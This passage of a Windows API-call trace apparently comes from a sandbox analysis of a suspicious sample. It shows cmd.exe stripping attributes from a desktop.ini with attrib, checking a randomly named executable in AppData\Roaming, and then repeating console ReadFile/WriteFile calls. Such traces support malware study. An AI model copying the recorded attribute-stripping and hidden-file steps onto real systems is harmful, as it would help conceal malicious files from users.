out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.540] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af3b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af480 | out: lpAttributeList=0x2af3b8, lpSize=0x2af480) returned 1 [0194.540] UpdateProcThreadAttribute (in: lpAttributeList=0x2af3b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af478, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af3b8, lpPreviousValue=0x0) returned 1 [0194.540] GetStartupInfoW (in: lpStartupInfo=0x2af374 | out: lpStartupInfo=0x2af374*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0194.541] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0194.542] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af414*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af460 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", lpProcessInformation=0x2af460*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb28, dwThreadId=0xb74)) returned 1 [0194.544] CloseHandle (hObject=0x4c) returned 1 [0194.544] SetEnvironmentVariableW 
(lpName="COPYCMD", lpValue=0x0) returned 1 [0194.544] GetEnvironmentStringsW () returned 0x3f0858* [0194.544] FreeEnvironmentStringsW (penv=0x3f0858) returned 1 [0194.544] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0194.769] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af354 | out: lpExitCode=0x2af354*=0x0) returned 1 [0194.769] CloseHandle (hObject=0x50) returned 1 [0194.769] _vsnwprintf (in: _Buffer=0x2af49c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af360 | out: _Buffer="00000000") returned 8 [0194.769] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0194.769] GetEnvironmentStringsW () returned 0x3f2548* [0194.770] FreeEnvironmentStringsW (penv=0x3f2548) returned 1 [0194.770] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0194.770] GetEnvironmentStringsW () returned 0x3f2548* [0194.770] FreeEnvironmentStringsW (penv=0x3f2548) returned 1 [0194.770] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af3b8 | out: lpAttributeList=0x2af3b8) [0194.770] GetConsoleTitleW (in: lpConsoleTitle=0x2af738, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~2\\desktop.ini")) returned 0xffffffff [0194.770] GetLastError () returned 0x2 [0194.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2010 [0194.771] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0194.771] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0194.771] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~2\\desktop.ini")) returned 0xffffffff [0194.771] GetLastError () returned 0x2 [0194.771] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2af1e4 | out: 
lpConsoleScreenBufferInfo=0x2af1e4) returned 1 [0194.771] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0194.773] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0194.773] GetConsoleTitleW (in: lpConsoleTitle=0x2af6d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.773] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0194.773] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.774] GetFileType (hFile=0x50) returned 0x1 [0194.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.774] GetFileType (hFile=0x50) returned 0x1 [0194.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.774] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] GetFileType (hFile=0x50) returned 0x1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] GetFileType (hFile=0x50) returned 0x1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] GetFileType (hFile=0x50) returned 0x1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] GetFileType (hFile=0x50) returned 0x1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] GetFileType (hFile=0x50) returned 0x1 [0194.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.776] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] GetFileType (hFile=0x50) returned 0x1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.777] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=4) returned 
0x58 [0194.777] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] GetFileType (hFile=0x50) returned 0x1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] GetFileType (hFile=0x50) returned 0x1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] GetFileType (hFile=0x50) returned 0x1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] GetFileType (hFile=0x50) returned 0x1 [0194.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.777] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] GetFileType (hFile=0x50) returned 0x1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] GetFileType (hFile=0x50) 
returned 0x1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] GetFileType (hFile=0x50) returned 0x1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] GetFileType (hFile=0x50) returned 0x1 [0194.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.778] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.778] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.778] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.779] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] GetFileType (hFile=0x50) returned 0x1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] GetFileType (hFile=0x50) returned 0x1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, 
lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] GetFileType (hFile=0x50) returned 0x1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] GetFileType (hFile=0x50) returned 0x1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] GetFileType (hFile=0x50) returned 0x1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.779] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, 
lpOverlapped=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.780] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.780] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.780] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, 
lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] GetFileType (hFile=0x50) returned 0x1 [0194.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.781] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.782] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.782] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0194.782] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] GetFileType (hFile=0x50) returned 0x1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] GetFileType (hFile=0x50) returned 0x1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] GetFileType (hFile=0x50) returned 0x1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] GetFileType (hFile=0x50) returned 0x1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] GetFileType (hFile=0x50) returned 0x1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.782] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.782] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] 
GetFileType (hFile=0x50) returned 0x1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] GetFileType (hFile=0x50) returned 0x1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] GetFileType (hFile=0x50) returned 0x1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.783] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.783] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] GetFileType (hFile=0x50) returned 0x1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] GetFileType (hFile=0x50) returned 0x1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | 
out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.783] GetFileType (hFile=0x50) returned 0x1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] GetFileType (hFile=0x50) returned 0x1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] GetFileType (hFile=0x50) returned 0x1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] GetFileType (hFile=0x50) returned 0x1 [0194.784] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.784] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.787] GetFileType (hFile=0x50) returned 0x1 [0194.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.787] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, 
